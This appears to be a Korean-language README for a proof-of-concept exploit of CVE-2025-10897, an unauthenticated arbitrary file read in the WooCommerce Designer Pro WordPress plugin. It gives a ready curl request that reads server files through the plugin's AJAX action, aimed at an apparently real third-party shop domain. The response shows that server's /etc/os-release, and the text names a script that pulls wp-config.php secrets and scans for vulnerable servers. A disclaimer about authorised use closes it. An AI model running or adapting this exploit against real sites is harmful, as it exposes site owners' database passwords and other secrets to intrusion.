
WooCommerce Designer Pro <= 1.9.28 - 인증되지 않은 임의 파일 읽기
WooCommerce는 웹사이트를 온라인 스토어로 전환해 주는 WordPress용 오픈소스 전자상거래 플러그인입니다. WooCommerce Designer Pro는 JMA Plugins에서 개발한 WordPress 플러그인으로, 고객이 WooCommerce 스토어에서 직접 제품을 디자인하고 맞춤 설정할 수 있게 해 줍니다.
중요: WooCommerce와 WooCommerce Designer Pro는 완전히 다른 제품입니다.
WooCommerce Designer Pro는 명함, 엽서, 전단지, 포스터, 티셔츠, 스티커 및 기타 인쇄 가능한 제품을 제작할 수 있도록 지원하며, CMYK 색상 지원, PDF 생성, 캔버스 기반 디자인 인터페이스 등의 기능을 제공합니다. 이 플러그인은 WooCommerce와 통합되어 구매 전에 실시간으로 제품을 맞춤 설정할 수 있게 하므로 온라인 인쇄 업체와 맞춤 상품 스토어에 적합합니다.
CVE-2025-10897은 WooCommerce Designer Pro 1.9.28 이하 버전에서 발생하는 인증되지 않은 임의 파일 읽기 취약점입니다(CWE-22). 공격자는 action=wcdp_convert_resource_cmyk 및 /etc/passwd나 wp-config.php와 같은 서버 파일을 가리키는 file:// URL을 포함한 POST /wp-admin/admin-ajax.php 요청을 전송합니다. 플러그인은 JSON 응답에 파일 내용을 반환합니다. 이를 통해 WordPress 계정 없이도 wp-config.php의 데이터베이스 비밀번호 및 기타 비밀 정보가 유출될 수 있습니다.
REQUEST
curl -sk -X POST 'https://www.procolorprints.ca/wp-admin/admin-ajax.php' \
-H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Accept: */*' \
-H 'Connection: close' \
-d 'action=wcdp_convert_resource_cmyk&url=file:///etc/os-release'
RESPONSE
{"string":"data:image\/jpg;base64,TkFNRT0iQWxtYUxpbnV4IgpWRVJTSU9OPSI5LjggKE9saXZlIEphZ3VhcikiCklEPSJhbG1hbGludXgiCklEX0xJS0U9InJoZWwgY2VudG9zIGZlZG9yYSIKVkVSU0lPTl9JRD0iOS44IgpQTEFURk9STV9JRD0icGxhdGZvcm06ZWw5IgpQUkVUVFlfTkFNRT0iQWxtYUxpbnV4IDkuOCAoT2xpdmUgSmFndWFyKSIKQU5TSV9DT0xPUj0iMDszNCIKTE9HTz0iZmVkb3JhLWxvZ28taWNvbiIKQ1BFX05BTUU9ImNwZTovbzphbG1hbGludXg6YWxtYWxpbnV4Ojk6OmJhc2VvcyIKSE9NRV9VUkw9Imh0dHBzOi8vYWxtYWxpbnV4Lm9yZy8iCkRPQ1VNRU5UQVRJT05fVVJMPSJodHRwczovL3dpa2kuYWxtYWxpbnV4Lm9yZy8iCkJVR19SRVBPUlRfVVJMPSJodHRwczovL2J1Z3MuYWxtYWxpbnV4Lm9yZy8iCgpBTE1BTElOVVhfTUFOVElTQlRfUFJPSkVDVD0iQWxtYUxpbnV4LTkiCkFMTUFMSU5VWF9NQU5USVNCVF9QUk9KRUNUX1ZFUlNJT049IjkuOCIKUkVESEFUX1NVUFBPUlRfUFJPRFVDVD0iQWxtYUxpbnV4IgpSRURIQVRfU1VQUE9SVEZVUFBSRURVQ1RfVkVSU0lPTj0iOS44IgpTVVBQT1JUX0VORD0yMDMyLTA2LTAxCg==","success":true}
Base64 디코딩 응답:
NAME="AlmaLinux"
VERSION="9.8 (Olive Jaguar)"
ID="almalinux"
ID_LIKE="rhel centos fedora"
VERSION_ID="9.8"
PLATFORM_ID="platform:el9"
PRETTY_NAME="AlmaLinux 9.8 (Olive Jaguar)"
ANSI_COLOR="0;34"
LOGO="fedora-logo-icon"
CPE_NAME="cpe:/o:almalinux:almalinux:9::baseos"
HOME_URL="https://almalinux.org/"
DOCUMENTATION_URL="https://wiki.almalinux.org/"
BUG_REPORT_URL="https://bugs.almalinux.org/"
ALMALINUX_MANTISBT_PROJECT="AlmaLinux-9"
ALMALINUX_MANTISBT_PROJECT_VERSION="9.8"
REDHAT_SUPPORT_PRODUCT="AlmaLinux"
REDHAT_SUPPORT_PRODUCT_VERSION="9.8"
SUPPORT_END=2032-06-01
python CVE-2025-10897-X7.py
참고: 당사의 PoC 스크립트는 wp-config.php를 가져오려고 시도하지만, 대상 서버가 /var/www가 아닌 다른 위치에 WordPress를 설치했을 수 있습니다.
취약한 서버를 검색하기 위한 인자
이 저장소와 그 내용은 합법적인 보안 연구, 승인된 침투 테스트, 교육 목적의 연구, 방어적 목적으로만 제공됩니다. 본 자료에 접근하거나 사용함으로써 귀하는 모든 활동이 적용 가능한 법률을 준수하고, 소유하지 않은 시스템에 대해 테스트하거나 이러한 기법을 적용하기 전에 적절한 승인을 받았는지 확인할 전적인 책임이 있음을 인정합니다.
이 프로젝트의 작성자와 유지관리자는 본 정보의 적용으로 인해 발생하는 손해, 법적 결과 또는 오용에 대해 어떠한 책임도 지지 않습니다. 승인되지 않은 접근, 악의적인 활동 또는 불법적인 목적의 사용은 명시적으로 금지되며 지원되지 않습니다.
책임감 있게 사용하세요. 법을 준수하세요. 자신이 소유했거나 명시적인 서면 허가를 받은 시스템에만 테스트하세요.
SCT-PL